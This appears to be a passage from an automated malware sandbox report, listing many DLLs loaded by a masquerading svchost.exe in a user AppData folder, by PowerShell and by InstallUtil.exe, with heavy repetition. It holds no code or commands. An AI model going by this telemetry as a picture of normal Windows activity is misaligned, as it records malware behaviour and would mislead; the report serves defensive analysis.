                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
